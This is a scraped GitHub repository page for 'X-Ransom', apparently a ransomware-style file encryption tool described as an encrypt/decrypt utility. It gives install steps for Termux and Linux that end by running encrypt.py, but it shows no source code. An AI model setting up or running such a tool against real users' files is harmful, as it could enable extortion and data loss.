Skip to content

MrG3P5/X-Ransom

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

png

Install In TERMUX

- apt update && apt upgrade -y
- pkg install python3 git python3-pip rust -y
- git clone https://github.com/MrG3P5/X-Ransom
- cd X-Ransom
- export CARGO_BUILD_TARGET=aarch64-linux-android
- pip3 install cryptography --no-binary cryptography
- pip3 install -r require.txt
- python3 encrypt.py

Install In Linux With Root

- sudo apt update && apt upgrade -y
- sudo apt-get install python3 git python3-pip -y
- git clone https://github.com/MrG3P5/X-Ransom
- cd X-Ransom
- pip3 install -r require.txt
- python3 encrypt.py

Tools Overview

enc/dec.py
index

About

A Tools for Encrypt/Decrypt File

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages